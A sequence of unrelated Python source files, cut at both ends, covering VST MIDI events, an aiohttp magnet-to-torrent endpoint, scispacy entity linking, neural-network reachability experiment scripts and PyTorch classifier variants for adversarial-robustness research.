        initial_value = [tag.name for tag in initial_value]
        initial_value.sort()
        return initial_value != data_value
|
11520761
|
from typing import Optional
from cython_vst_loader.vst_constants import VstEventTypes
class VstEvent:
    """Generic VST event record; every field starts unset (None)."""

    def __init__(self):
        # Populated later by concrete event types / the loader.
        self.type: Optional[int] = None
        self.byte_size: Optional[int] = None
        self.delta_frames: Optional[int] = None
        self.flags: Optional[int] = None
        self.data: Optional[bytes] = None

    def is_midi(self) -> bool:
        """Whether this event carries MIDI data."""
        return self.type == VstEventTypes.kVstMidiType


class VstMidiEvent(VstEvent):
    _NOTE_ON: str = 'note_on'
    _NOTE_OFF: str = 'note_off'

    def __init__(self, delta_frames: int):
        super().__init__()
        self.delta_frames = delta_frames
        self.type: int = VstEventTypes.kVstMidiType
        self.flags = 0
        self.note_length: Optional[int] = None
        self.note_offset: Optional[int] = None
        self.midi_data: bytearray = bytearray(4)
        self.detune: int = 0
        self.note_off_velocity: int = 0
        self.reserved1: int = 0
        self.reserved2: int = 0

    @classmethod
    def _midi_note_as_bytes(cls, note: int, velocity: int = 100, kind: str = 'note_on', channel: int = 1) -> bytes:
        """Encode a 3-byte MIDI note message (status, note, velocity).

        borrowed from here:
        https://github.com/simlmx/pyvst/blob/ded9ff373f37d1cbe8948ccb053ff4849f45f4cb/pyvst/midi.py#L11
        :param note:
        :param velocity:
        :param kind:
        :param channel: Midi channel (those are 1-indexed)
        """
        status_bytes = {cls._NOTE_ON: b'\x90'[0], cls._NOTE_OFF: b'\x80'[0]}
        kind_byte = status_bytes.get(kind)
        if kind_byte is None:
            raise NotImplementedError('MIDI type {} not supported yet'.format(kind))
        if not (1 <= channel <= 16):
            raise ValueError('Invalid channel "{}". Must be in the [1, 16] range.'
                             .format(channel))
        # Low nibble of the status byte holds the zero-based channel.
        return bytes(((channel - 1) | kind_byte, note, velocity))


class VstNoteOnMidiEvent(VstMidiEvent):
    """MIDI event pre-filled with a note-on message."""

    def __init__(self, delta_frames: int, note: int, velocity: int, channel: int):
        super().__init__(delta_frames)
        self.midi_data = self._midi_note_as_bytes(note, velocity, kind=self._NOTE_ON, channel=channel)


class VstNoteOffMidiEvent(VstMidiEvent):
    """MIDI event pre-filled with a note-off message (velocity 0)."""

    def __init__(self, delta_frames: int, note: int, channel: int):
        super().__init__(delta_frames)
        self.midi_data = self._midi_note_as_bytes(note, 0, kind=self._NOTE_OFF, channel=channel)
|
11520777
|
import base64
from urllib.parse import quote
from aiohttp import web
from . import settings
from .core import Magnet2Torrent
from .utils import FailedToFetchException
routes = web.RouteTableDef()
@routes.get("/")
async def get_torrent(request):
    """Resolve a magnet link to a torrent file.

    Query parameters:
      * ``magnet`` (required): the magnet URI to resolve.
      * ``apikey``: must match ``settings.SERVE_APIKEY`` when that is set.
      * ``direct``: when present, respond with the raw .torrent as an
        attachment instead of a JSON envelope with base64 torrent data.
    """
    if settings.SERVE_APIKEY and request.query.getone("apikey", None) != settings.SERVE_APIKEY:
        raise web.HTTPUnauthorized()
    try:
        magnet = request.query["magnet"]
    except KeyError:
        # Fix: was a bare `except:`, which also swallows CancelledError
        # and unrelated bugs; a missing query key only raises KeyError.
        return web.json_response({"status": "error", "message": "magnet argument missing from url"}, status=400, )
    m2t = Magnet2Torrent(magnet, dht_server=settings.DHT_SERVER, torrent_cache_folder=settings.TORRENT_CACHE_FOLDER, )
    try:
        torrent = await m2t.retrieve_torrent()
    except FailedToFetchException:
        return web.json_response({"status": "error", "message": "failed to retrieve magnet link"}, status=500)
    if request.query.getone("direct", None) is not None:
        # RFC 5987 encoded filename so non-ASCII torrent names survive.
        return web.Response(body=torrent.data_encode(),
                            headers={"Content-Disposition": "attachment; filename*=UTF-8''{}".format(
                                quote(torrent.name))},
                            )
    else:
        return web.json_response(
            {"status": "success", "filename": torrent.name,
             "torrent_data": base64.b64encode(torrent.data_encode()).decode("utf-8")}
        )
|
11520785
|
from collections import defaultdict
from scispacy.abbreviation import AbbreviationDetector
from scispacy.linking import EntityLinker
class EntityLink:
    """Run spaCy entity extraction over sentences, optionally with UMLS linking."""

    def __init__(self, nlp, linkage_mode, data):
        # nlp: a loaded spaCy pipeline; linkage_mode: "umls" or "spacy";
        # data: list of sentence strings.
        self.sents = data
        self.nlp = nlp
        self.linkage_mode = linkage_mode

    def umls_entlink(self):
        """
        Add UMLS entity linker and abbreviation detector to spaCy pipeline_ie
        """
        # NOTE(review): passing component objects to add_pipe follows the
        # spaCy v2 API; spaCy v3 expects registered string names — confirm
        # the pinned spaCy/scispacy versions.
        abbreviation_pipe = AbbreviationDetector(self.nlp)
        self.nlp.add_pipe(abbreviation_pipe)
        linker = EntityLinker(resolve_abbreviations=True, name="umls")
        self.nlp.add_pipe(linker)

    def spacy_entlink(self):
        """
        Extracts entities for given list of text using spacy entity linker.
        :return:
            - sents: list
            - entities: dict
        list of sentences and a dictionary where key is the sentence number and value its corresponding list of entities
        """
        entities = defaultdict(list)
        # Idiom fix: enumerate replaces the manual counter, and list()
        # replaces the identity comprehension over doc.ents.
        for i, sentence in enumerate(self.sents):
            doc = self.nlp(sentence)
            entities[str(i)] = list(doc.ents)
        return self.sents, entities

    def entity_linkage(self):
        """Dispatch on linkage_mode; returns (sents, entities) or None for
        an unrecognized mode."""
        if self.linkage_mode == "umls":
            self.umls_entlink()
            return self.spacy_entlink()
        elif self.linkage_mode == "spacy":
            return self.spacy_entlink()
|
11520790
|
import nn_closed_loop.example as ex
import numpy as np
from tabulate import tabulate
import pandas as pd
import datetime
import os
import glob
import matplotlib.pyplot as plt
import argparse
import nn_closed_loop.dynamics as dynamics
import nn_closed_loop.analyzers as analyzers
import nn_closed_loop.constraints as constraints
from nn_closed_loop.utils.nn import load_controller
# All experiment artifacts (pickled dataframes, plots) are written here,
# relative to this file; created eagerly at import time.
results_dir = "{}/results/logs/".format(
    os.path.dirname(os.path.abspath(__file__))
)
os.makedirs(results_dir, exist_ok=True)
class Experiment:
    """Base class for all experiments: maps (propagator, partitioner)
    pairs to display metadata (legend name, line color, line style)."""

    def __init__(self):
        # Keys are (propagator, partitioner); 'name' strings may embed
        # LaTeX \cite commands for the paper tables.
        self.info = {
            ('CROWN', 'Uniform'): {
                'name': 'Reach-LP-Partition',
                'color': 'tab:green',
                'ls': '-',
            },
            ('CROWN', 'None'): {
                'name': 'Reach-LP',
                'color': 'tab:green',
                'ls': '--',
            },
            ('SDP', 'Uniform'): {
                'name': 'Reach-SDP-Partition',
                'color': 'tab:red',
                'ls': '-',
            },
            ('SDP', 'None'): {
                # NOTE(review): '\c' is an invalid escape sequence in a
                # non-raw string — consider a raw string literal here.
                'name': 'Reach-SDP~\cite{hu2020reach}',
                'color': 'tab:red',
                'ls': '--',
            },
            ('SeparableCROWN', 'None'): {
                'name': 'CL-CROWN',
            },
            ('SeparableSGIBP', 'None'): {
                'name': 'CL-SG-IBP~\cite{xiang2020reachable}',
            },
        }
class CompareMultipleCombos(Experiment):
    """Run several CROWN partitioner variants on the double integrator and
    pickle per-run error/runtime stats."""

    def __init__(self):
        # {dt} is filled with a timestamp at save time.
        self.filename = results_dir + 'alg_error_{dt}_table.pkl'
        Experiment.__init__(self)
    def run(self):
        """Run each experiment config and pickle one DataFrame row per run."""
        dt = datetime.datetime.now().strftime('%Y_%m_%d__%H_%M_%S')
        parser = ex.setup_parser()
        args = parser.parse_args()
        args.save_plot = False
        args.show_plot = False
        args.make_animation = False
        args.show_animation = False
        args.init_state_range = "[[2.5, 3.0], [-0.25, 0.25]]"
        args.state_feedback = True
        args.boundaries = "lp"
        args.system = "double_integrator"
        args.t_max = 5
        args.estimate_runtime = True
        expts = [
            {
                'partitioner': 'UnGuided',
                'propagator': 'CROWN',
            },
            {
                'partitioner': 'SimGuided',
                'propagator': 'CROWN',
            },
            {
                'partitioner': 'GreedySimGuided',
                'propagator': 'CROWN',
            },
        ]
        df = pd.DataFrame()
        for expt in expts:
            for key, value in expt.items():
                setattr(args, key, value)
            stats, info = ex.main(args)
            for i, runtime in enumerate(stats['runtimes']):
                # NOTE(review): DataFrame.append was removed in pandas 2.0;
                # collect dicts in a list and pd.concat once instead.
                df = df.append({
                    **expt,
                    'run': i,
                    'runtime': runtime,
                    'final_step_error': stats['final_step_errors'][i],
                    'avg_error': stats['avg_errors'][i],
                    'output_constraint': stats['output_constraints'][i],
                }, ignore_index=True)
        df.to_pickle(self.filename.format(dt=dt))
    def plot(self):
        # No plotting implemented for this experiment yet.
        raise NotImplementedError
class CompareRuntimeVsErrorTable(Experiment):
    """Benchmark several propagator/partitioner combinations on the double
    integrator and produce the runtime-vs-error table and figures."""

    def __init__(self):
        # {dt} is filled with a timestamp at save time.
        self.filename = results_dir + 'runtime_vs_error_{dt}_table.pkl'
        Experiment.__init__(self)
    def run(self):
        """Run all configurations and pickle one row per (config, run)."""
        dt = datetime.datetime.now().strftime('%Y_%m_%d__%H_%M_%S')
        parser = ex.setup_parser()
        args = parser.parse_args()
        args.save_plot = False
        args.show_plot = False
        args.make_animation = False
        args.show_animation = False
        args.init_state_range = "[[2.5, 3.0], [-0.25, 0.25]]"
        args.state_feedback = True
        args.boundaries = "lp"
        args.system = "double_integrator"
        args.t_max = 5
        args.estimate_runtime = True
        expts = [
            {
                'partitioner': 'None',
                'propagator': 'SeparableCROWN',
            },
            {
                'partitioner': 'None',
                'propagator': 'SeparableSGIBP',
            },
            {
                'partitioner': 'None',
                'propagator': 'CROWN',
            },
            {
                'partitioner': 'Uniform',
                'num_partitions': "[4, 4]",
                'propagator': 'CROWN',
            },
            {
                'partitioner': 'None',
                'propagator': 'SDP',
                'cvxpy_solver': 'MOSEK',
            },
            {
                'partitioner': 'Uniform',
                'num_partitions': "[4, 4]",
                'propagator': 'SDP',
                'cvxpy_solver': 'MOSEK',
            },
        ]
        df = pd.DataFrame()
        for expt in expts:
            for key, value in expt.items():
                setattr(args, key, value)
            stats, info = ex.main(args)
            for i, runtime in enumerate(stats['runtimes']):
                # NOTE(review): DataFrame.append was removed in pandas 2.0;
                # collect dicts in a list and pd.concat once instead.
                df = df.append({
                    **expt,
                    'run': i,
                    'runtime': runtime,
                    'final_step_error': stats['final_step_errors'][i],
                    'avg_error': stats['avg_errors'][i],
                    'output_constraint': stats['output_constraints'][i],
                    'all_errors': stats['all_errors'][i],
                }, ignore_index=True)
        df.to_pickle(self.filename.format(dt=dt))
    def grab_latest_groups(self):
        """Load the newest results pickle and group rows by (propagator,
        partitioner); returns (grouped, filename)."""
        # Grab latest file as pandas dataframe
        list_of_files = glob.glob(self.filename.format(dt='*'))
        latest_filename = max(list_of_files, key=os.path.getctime)
        df = pd.read_pickle(latest_filename)
        # df will have every trial, so group by which prop/part was used
        groupby = ['propagator', 'partitioner']
        grouped = df.groupby(groupby)
        return grouped, latest_filename
    def plot(self):
        """Print the runtime/error table, plain text and LaTeX."""
        grouped, filename = self.grab_latest_groups()
        # Setup table columns
        rows = []
        rows.append(["Algorithm", "Runtime [s]", "Error"])
        tuples = []
        tuples += [('SeparableCROWN', 'None'), ('SeparableSGIBP', 'None')]
        tuples += [(prop, part) for part in ['None', 'Uniform'] for prop in ['SDP', 'CROWN']]
        # Go through each combination of prop/part we want in the table
        for prop_part_tuple in tuples:
            try:
                group = grouped.get_group(prop_part_tuple)
            except KeyError:
                # This combination was not run; skip its table row.
                continue
            name = self.info[prop_part_tuple]['name']
            mean_runtime = group['runtime'].mean()
            std_runtime = group['runtime'].std()
            runtime_str = "${:.3f} \pm {:.3f}$".format(mean_runtime, std_runtime)
            final_step_error = group['final_step_error'].mean()
            # Add the entries to the table for that prop/part
            row = []
            row.append(name)
            row.append(runtime_str)
            # NOTE(review): round() with no digits truncates the error to
            # an int — confirm this is the intended table precision.
            row.append(round(final_step_error))
            rows.append(row)
        # print as a human-readable table and as a latex table
        print(tabulate(rows, headers='firstrow'))
        print()
        print(tabulate(rows, headers='firstrow', tablefmt='latex_raw'))
    def plot_error_vs_timestep(self):
        """Plot approximation error vs. time step (log y-axis) for each
        prop/part combination and save next to the data pickle."""
        grouped, filename = self.grab_latest_groups()
        fig, ax = plt.subplots(1, 1)
        # Go through each combination of prop/part we want in the table
        for propagator in ['SDP', 'CROWN']:
            for partitioner in ['None', 'Uniform']:
                prop_part_tuple = (propagator, partitioner)
                try:
                    group = grouped.get_group(prop_part_tuple)
                except KeyError:
                    continue
                all_errors = group['all_errors'].iloc[0]
                t_max = all_errors.shape[0]
                label = self.info[prop_part_tuple]['name']
                # replace citation with the ref number in this plot
                label = label.replace('~\\cite{hu2020reach}', ' [22]')
                plt.plot(
                    np.arange(1, t_max+1),
                    all_errors,
                    color=self.info[prop_part_tuple]['color'],
                    ls=self.info[prop_part_tuple]['ls'],
                    label=label,
                )
        plt.legend()
        ax.set_yscale('log')
        plt.xlabel('Time Steps')
        plt.ylabel('Approximation Error')
        plt.tight_layout()
        # Save plot with similar name to pkl file that contains data
        fig_filename = filename.replace('table', 'timestep').replace('pkl', 'png')
        plt.savefig(fig_filename)
        # plt.show()
    def plot_reachable_sets(self):
        """Overlay the reachable-set estimates of each prop/part combo plus
        shaded goal/avoid regions, and save next to the data pickle."""
        grouped, filename = self.grab_latest_groups()
        dyn = dynamics.DoubleIntegrator()
        controller = load_controller(name="double_integrator")
        init_state_range = np.array(
            [ # (num_inputs, 2)
                [2.5, 3.0], # x0min, x0max
                [-0.25, 0.25], # x1min, x1max
            ]
        )
        partitioner_hyperparams = {
            "type": "None",
        }
        propagator_hyperparams = {
            "type": "CROWN",
            "input_shape": init_state_range.shape[:-1],
        }
        # Set up analyzer (+ parititoner + propagator)
        analyzer = analyzers.ClosedLoopAnalyzer(controller, dyn)
        # NOTE(review): assigning hyperparameter dicts presumably goes
        # through property setters that build the actual partitioner and
        # propagator objects — confirm in ClosedLoopAnalyzer.
        analyzer.partitioner = partitioner_hyperparams
        analyzer.propagator = propagator_hyperparams
        input_constraint = constraints.LpConstraint(
            range=init_state_range, p=np.inf
        )
        inputs_to_highlight = [
            {"dim": [0], "name": "$\mathbf{x}_0$"},
            {"dim": [1], "name": "$\mathbf{x}_1$"},
        ]
        t_max = 5
        analyzer.partitioner.setup_visualization(
            input_constraint,
            t_max,
            analyzer.propagator,
            show_samples=True,
            inputs_to_highlight=inputs_to_highlight,
            aspect="auto",
            initial_set_color=analyzer.initial_set_color,
            initial_set_zorder=analyzer.initial_set_zorder,
            sample_zorder=analyzer.sample_zorder
        )
        analyzer.partitioner.linewidth = 1
        # Go through each combination of prop/part we want in the table
        for propagator in ['SDP', 'CROWN']:
            for partitioner in ['None', 'Uniform']:
                prop_part_tuple = (propagator, partitioner)
                try:
                    group = grouped.get_group(prop_part_tuple)
                except KeyError:
                    continue
                output_constraint = group['output_constraint'].iloc[0]
                analyzer.partitioner.visualize(
                    [],
                    [],
                    output_constraint,
                    None,
                    reachable_set_color=self.info[prop_part_tuple]['color'],
                    reachable_set_ls=self.info[prop_part_tuple]['ls'],
                    reachable_set_zorder=analyzer.reachable_set_zorder
                )
                analyzer.partitioner.default_patches = analyzer.partitioner.animate_axes.patches.copy()
                analyzer.partitioner.default_lines = analyzer.partitioner.animate_axes.lines.copy()
        # Add shaded regions for verification
        goal_arr = np.array([
            [-0.5, 0.5],
            [-0.25, 0.25],
        ])
        dims = analyzer.partitioner.input_dims
        color = "None"
        fc_color = "lightblue"
        linewidth = 1
        ls = '-'
        rect = constraints.make_rect_from_arr(goal_arr, dims, color, linewidth, fc_color, ls, zorder=0)
        analyzer.partitioner.animate_axes.add_patch(rect)
        avoid_arr = np.array([
            analyzer.partitioner.animate_axes.get_xlim(),
            [0.35, analyzer.partitioner.animate_axes.get_ylim()[1]],
        ])
        dims = analyzer.partitioner.input_dims
        color = "None"
        fc_color = "wheat"
        linewidth = 1
        ls = '-'
        rect = constraints.make_rect_from_arr(avoid_arr, dims, color, linewidth, fc_color, ls, zorder=0)
        analyzer.partitioner.animate_axes.add_patch(rect)
        plt.tight_layout()
        # Save plot with similar name to pkl file that contains data
        fig_filename = filename.replace('table', 'reachable').replace('pkl', 'png')
        plt.savefig(fig_filename)
        # plt.show()
class CompareLPvsCF(Experiment):
    """Compare LP-based vs closed-form CROWN propagators across partition
    counts (1, 4, 16) for a given system; output is a runtime table."""

    def __init__(self, system):
        # system: "quadrotor" or "double_integrator".
        self.system = system
        Experiment.__init__(self)
    def run(self):
        """Time both propagators per partition setting; store rows on self.data."""
        rows = []
        rows.append(["", "1", "4", "16"])
        propagator_names = {"CROWNLP": "L.P.", "CROWN": "C.F."}
        t_max = {"quadrotor": 2, "double_integrator": 5}
        partitions = {
            'quadrotor': ["[1,1,1,1,1,1]", "[2,2,1,1,1,1]", "[2,2,2,2,1,1]"],
            'double_integrator': ["[1,1]", "[2,2]", "[4,4]"]
        }
        parser = ex.setup_parser()
        for propagator in ["CROWNLP", "CROWN"]:
            row = [propagator_names[propagator]]
            for num_partitions in partitions[self.system]:
                args = parser.parse_args()
                args.partitioner = "Uniform"
                args.propagator = propagator
                args.system = self.system
                args.state_feedback = True
                args.t_max = t_max[self.system]
                args.num_partitions = num_partitions
                args.estimate_runtime = True
                stats, info = ex.main(args)
                mean_runtime = stats['runtimes'].mean()
                std_runtime = stats['runtimes'].std()
                runtime_str = "${:.3f} \pm {:.3f}$".format(mean_runtime, std_runtime)
                row.append(runtime_str)
            rows.append(row)
        self.data = rows
    def plot(self):
        """Print the timing table; requires run() first (no pickle loading yet)."""
        if hasattr(self, "data"):
            rows = self.data
        else:
            # Grab from specific pkl file
            raise NotImplementedError
        print(tabulate(rows, headers='firstrow'))
        print()
        print(tabulate(rows, headers='firstrow', tablefmt='latex_raw'))
class NxScalability(Experiment):
    """Measure how analysis runtime scales with the number of states (n_x)
    or control inputs (n_u), sweeping a synthetic "unity" system."""

    def __init__(self, state_or_control="state"):
        # Template for the pickle file holding the raw results table.
        self.filename = results_dir + 'runtime_vs_num_{x_or_u}_{dt}_table.pkl'
        # "state" sweeps args.nx; "control" sweeps args.nu.
        self.state_or_control = state_or_control
        Experiment.__init__(self)

    def run(self):
        """Run the sweep and pickle a DataFrame with one row per repeated run."""
        dt = datetime.datetime.now().strftime('%Y_%m_%d__%H_%M_%S')

        parser = ex.setup_parser()
        args = parser.parse_args()
        args.save_plot = False
        args.show_plot = False
        args.make_animation = False
        args.show_animation = False
        # args.init_state_range = "[[2.5, 3.0], [-0.25, 0.25]]"
        args.state_feedback = True
        args.boundaries = "lp"
        args.system = "unity"
        args.t_max = 5
        args.estimate_runtime = True

        expts = [
            {
                'partitioner': 'None',
                'propagator': 'CROWN',
            },
            # {
            #     'partitioner': 'None',
            #     'propagator': 'SDP',
            #     'cvxpy_solver': 'MOSEK',
            # },
        ]

        nxs = [2, 3, 4, 10, 20, 30, 50, 100]

        df = pd.DataFrame()
        for nx in nxs:
            for expt in expts:
                for key, value in expt.items():
                    setattr(args, key, value)
                if self.state_or_control == "state":
                    args.nx = nx
                elif self.state_or_control == "control":
                    args.nu = nx
                stats, info = ex.main(args)

                # DataFrame.append was deprecated and removed in pandas 2.x;
                # build the per-run rows and concatenate once per sweep point.
                new_rows = [{
                    **expt,
                    'run': i,
                    'runtime': runtime,
                    'final_step_error': stats['final_step_errors'][i],
                    'avg_error': stats['avg_errors'][i],
                    'output_constraint': stats['output_constraints'][i],
                    'all_errors': stats['all_errors'][i],
                    'nx': nx,
                } for i, runtime in enumerate(stats['runtimes'])]
                df = pd.concat([df, pd.DataFrame(new_rows)], ignore_index=True)
        df.to_pickle(self.filename.format(x_or_u=self.state_or_control, dt=dt))

    def plot(self):
        """Plot mean runtime (with +/- 1 std band) vs. the swept dimension,
        loading the most recent results pickle."""
        # Grab latest file as pandas dataframe
        list_of_files = glob.glob(self.filename.format(x_or_u=self.state_or_control, dt='*'))
        latest_filename = max(list_of_files, key=os.path.getctime)
        df = pd.read_pickle(latest_filename)

        runtime_mean_series = df.groupby(['propagator', 'nx']).runtime.mean().unstack()
        runtime_std_series = df.groupby(['propagator', 'nx']).runtime.std().unstack()

        plt.clf()
        color = 'tab:green'
        plt.plot(runtime_mean_series.columns.to_numpy(), runtime_mean_series.iloc[0].to_numpy(), color=color)
        plt.gca().fill_between(runtime_mean_series.columns.to_numpy(), runtime_mean_series.iloc[0].to_numpy()-runtime_std_series.iloc[0].to_numpy(), runtime_mean_series.iloc[0].to_numpy(), alpha=0.2, color=color)
        plt.gca().fill_between(runtime_mean_series.columns.to_numpy(), runtime_mean_series.iloc[0].to_numpy(), runtime_mean_series.iloc[0].to_numpy()+runtime_std_series.iloc[0].to_numpy(), alpha=0.2, color=color)

        if self.state_or_control == "state":
            plt.xlabel('Number of States, $n_x$')
        elif self.state_or_control == "control":
            plt.xlabel('Number of Control Inputs, $n_u$')
        plt.ylabel('Computation Time [s]')
        plt.tight_layout()

        # Save plot with similar name to pkl file that contains data
        fig_filename = latest_filename.replace('table', 'runtime_'+self.state_or_control).replace('pkl', 'png')
        plt.savefig(fig_filename)
# Entry point: reproduce the ICRA'21-style comparison by default; the other
# experiments are left commented out and can be enabled individually.
if __name__ == '__main__':
    # Like Fig 3 in ICRA21 paper
    c = CompareRuntimeVsErrorTable()
    c.run()
    c.plot()  # 3A: table
    c.plot_reachable_sets()  # 3B: overlay reachable sets
    c.plot_error_vs_timestep()  # 3C: error vs timestep

    # c = CompareLPvsCF(system="double_integrator")
    # c.run()
    # c.plot()
    # c = CompareLPvsCF(system="quadrotor")
    # c.run()
    # c.plot()

    # See how runtime scales with number of states
    # c = NxScalability("state")
    # c.run()
    # c.plot()

    # See how runtime scales with number of control inputs
    # c = NxScalability("control")
    # c.run()
    # c.plot()

    # WIP...
    # c = CompareMultipleCombos()
    # c.run()
    # c.plot()
|
11520833
|
import torch
import torch.nn as nn
from torch.autograd.function import Function
import torch.nn.functional as F
from torch.nn import Parameter
import numpy as np
import os
import math
import pdb
import time
import copy
import mmcv
from sklearn.cluster import KMeans
# This file contains implementations of some algorithms not reported in the paper,
# which we think could be of close relationship to the task.
# Since they have not been double checked or cleaned up, feel free to contact
# us should you have any questions.
class BN_Classifier(nn.Module):
    """Classifier head that, besides a shared BN+ReLU+FC path, tracks separate
    BatchNorm running statistics per input distribution (``bn_names``, e.g.
    clean vs. several PGD attacks), optionally one BN per class per name."""

    def __init__(self, num_classes=10, in_dim=640, samples_per_cls=None, norm=True,
                 use_tracked_mean=True, use_tracked_var=True, use_relu=True,
                 bn_names=('CLEAN', 'PGD-5', 'PGD-10', 'PGD-20'),
                 bn_per_cls=False):
        super(BN_Classifier, self).__init__()
        self.num_classes = num_classes
        self.samples_per_cls = samples_per_cls
        self.in_dim = in_dim
        self.fc = nn.Linear(in_dim, num_classes)
        self.bn1 = nn.BatchNorm2d(in_dim)       # shared BN used in forward()
        self.relu = nn.ReLU(inplace=True)
        self.norm = norm
        self.use_relu = use_relu
        self.use_tracked_mean = use_tracked_mean
        self.use_tracked_var = use_tracked_var
        self.bn_per_cls = bn_per_cls            # one BN per (name, class) if True
        self.bn_names = bn_names
        # name -> BatchNorm2d (or list of per-class BatchNorm2d's); these only
        # accumulate running stats via fine_bn(), they are not on the forward path.
        self.bn_pool = {}
        self.init_bn_pool()

    def init_bn_pool(self):
        """Create the per-name (and optionally per-class) BN modules and the
        tensors mirroring their running statistics."""
        if self.bn_per_cls:
            # NOTE(review): nn.Parameter(...).cuda() returns a plain tensor
            # copy, so these are not registered as module parameters — confirm
            # that is intended (they are requires_grad=False bookkeeping).
            self.bn_running_means = nn.Parameter(torch.zeros(len(self.bn_names), self.num_classes, self.in_dim), requires_grad=False).cuda()
            self.bn_running_vars = nn.Parameter(torch.ones(len(self.bn_names), self.num_classes, self.in_dim), requires_grad=False).cuda()
            for idx, name in enumerate(self.bn_names):
                self.bn_pool.update(
                    {name: [nn.BatchNorm2d(self.in_dim).cuda() for _ in range(self.num_classes)]}
                )
                for i in range(self.num_classes):
                    self.bn_running_means[idx][i] = self.bn_pool[name][i].running_mean
                    self.bn_running_vars[idx][i] = self.bn_pool[name][i].running_var
        else:
            self.bn_running_means = nn.Parameter(torch.zeros(len(self.bn_names), self.in_dim), requires_grad=False).cuda()
            self.bn_running_vars = nn.Parameter(torch.ones(len(self.bn_names), self.in_dim), requires_grad=False).cuda()
            for idx, name in enumerate(self.bn_names):
                self.bn_pool.update(
                    {name: nn.BatchNorm2d(self.in_dim).cuda()}
                )
                self.bn_running_means[idx] = self.bn_pool[name].running_mean
                self.bn_running_vars[idx] = self.bn_pool[name].running_var
        # self.name2idx = dict()
        # for idx, name in enumerate(self.bn_names):
        #     self.name2idx.update({name: idx})

    def fine_bn(self, inputs, targets, name):
        """Feed *inputs* through the BN(s) of *name* purely to update their
        running statistics; the outputs are discarded."""
        if self.bn_per_cls:
            for i in range(self.num_classes):
                self.bn_pool[name][i](inputs[targets == i])
        else:
            self.bn_pool[name](inputs)
        return

    def forward(self, inputs, targets=None, name=None):
        """Classify *inputs*; during training, also update the running stats
        of the BN pool entry selected by *name* (if given)."""
        # separate bn
        if name is not None and self.training:
            self.fine_bn(inputs, targets, name)
        # overall bn
        out = self.bn1(inputs)
        if self.use_relu:
            out = self.relu(out)
        out = F.avg_pool2d(out, 8)     # assumes 8x8 spatial input — TODO confirm
        out = out.view(-1, self.in_dim)
        out = self.fc(out)
        return out

    def on_epoch(self):
        """Copy the pool's running statistics into the mirror tensors
        (call once per epoch)."""
        if self.bn_per_cls:
            for idx, name in enumerate(self.bn_names):
                for i in range(self.num_classes):
                    self.bn_running_means[idx][i] = self.bn_pool[name][i].running_mean
                    self.bn_running_vars[idx][i] = self.bn_pool[name][i].running_var
        else:
            for idx, name in enumerate(self.bn_names):
                self.bn_running_means[idx] = self.bn_pool[name].running_mean
                self.bn_running_vars[idx] = self.bn_pool[name].running_var
class Mix_Classifier(nn.Module):
    """Linear classifier trained with a mixup variant whose mixing coefficient
    is re-weighted by class-balanced weights computed from the "effective
    number of samples" formula (1 - beta^n) / (1 - beta)."""

    def __init__(self, num_classes=10, in_dim=640, samples_per_cls=None,
                 norm=True, alpha=1.0, noise_alpha=0.2, beta=0.9999):
        super(Mix_Classifier, self).__init__()
        self.num_classes = num_classes
        self.alpha = alpha
        self.noise_alpha = noise_alpha  # caps how far lam may drop below 1
        self.samples_per_cls = torch.tensor(samples_per_cls).cuda()
        self.fc = nn.Linear(in_dim, num_classes)
        self.in_dim = in_dim
        self.norm = norm
        # Class-balanced weights: normalized so they sum to num_classes.
        effective_num = 1.0 - np.power(beta, samples_per_cls)
        self.effective_num = torch.tensor(effective_num).float().unsqueeze(0).cuda()
        weights = (1.0 - beta) / np.array(effective_num)
        weights = weights / np.sum(weights) * num_classes
        self.weights = torch.tensor(weights).float().unsqueeze(0).cuda()
        print(self.weights)

    def mixup_data(self, x, y):
        '''Returns mixed inputs, pairs of targets, and lambda'''
        batch_size = x.shape[0]
        if self.alpha > 0:
            # Per-sample uniform mixing weight (not the usual Beta(alpha, alpha)).
            lam = torch.rand(batch_size,1,1,1).cuda()
        else:
            lam = 1
        lam = 1. - self.noise_alpha * (1 - lam) # lam itself is the bigger one
        batch_size = x.size()[0]
        index = torch.randperm(batch_size).cuda()
        y_a = y
        y_b = y[index]
        # lam = torch.where(self.samples_per_cls[y_a] > self.samples_per_cls[y_b], lam, 1-lam)
        # lam = torch.where(self.samples_per_cls[y_a] == self.samples_per_cls[y_b], lam, lam/self.noise_alpha)
        lam = lam.view(-1,1,1,1)
        mixed_x = lam * x + (1 - lam) * x[index, :]
        # Shrink the contribution of the mixed-in target y_b by its class weight.
        lam = 1 - (1 - lam.view(-1)) * self.weights.squeeze()[y_b]
        return mixed_x, y_a, y_b, lam

    def mixup_criterion(self, pred, y_a, y_b, lam):
        # NOTE(review): CrossEntropyLoss defaults to mean reduction, so each
        # term is a scalar multiplied by the per-sample vector `lam`; if a
        # per-sample mix was intended, reduction='none' would be needed — confirm.
        loss = lam * nn.CrossEntropyLoss()(pred, y_a) + (1 - lam) * nn.CrossEntropyLoss()(pred, y_b)
        return loss.mean()

    def forward (self, inputs, **kwargs):
        """Plain linear classification of the (already extracted) features."""
        outputs = self.fc(inputs)
        return outputs

    def loss(self, logits, targets_a, targets_b, lam):
        """Mixup loss wrapper over mixup_criterion."""
        loss = self.mixup_criterion(logits, targets_a, targets_b, lam)
        return loss
class MC_Classifier(nn.Module):
    """Multi-centroid classifier: a linear head plus per-class feature
    centroids (K-means over an epoch's feature bank) used by an adversarial
    loss that scores the true class by its *closest* centroid and every other
    class by its *farthest* one."""

    def __init__(self, num_classes=10, in_dim=640, samples_per_cls=None,
                 num_centroids=2, norm=True):
        super(MC_Classifier, self).__init__()
        self.num_classes = num_classes
        self.num_centroids = num_centroids
        self.samples_per_cls = samples_per_cls
        self.fc = nn.Linear(in_dim, num_classes)
        self.in_dim = in_dim
        self.norm = norm  # if True, adv_loss uses cosine similarity
        # One list of features per class, refilled each epoch.
        self.feature_bank = [[] for _ in range(self.num_classes)]
        self.centroids = torch.zeros((num_classes, num_centroids, in_dim))
        # Bug fix: `.type` without parentheses printed the bound method object.
        print(self.fc.weight.dtype)

    def forward(self, inputs, **kwargs):
        """Linear classification; also caches the batch's features for callers."""
        logits = self.fc(inputs)
        self.batch_features = inputs
        return logits

    def adv_loss(self, inputs, labels):
        """Cross-entropy over centroid similarities: min-centroid logit for the
        ground-truth class, max-centroid logit for all other classes."""
        # (batch, num_classes * num_centroids) similarity scores.
        logits = torch.matmul(inputs, self.centroids_classifier.t())
        if self.norm:
            inputs_norm = inputs.norm(dim=-1, p=2, keepdim=True)
            centroids_norm = self.centroids_classifier.norm(dim=-1, p=2, keepdim=True)
            logits = logits / inputs_norm / centroids_norm.t()
        logits = logits.view(inputs.shape[0], self.num_classes, self.num_centroids)
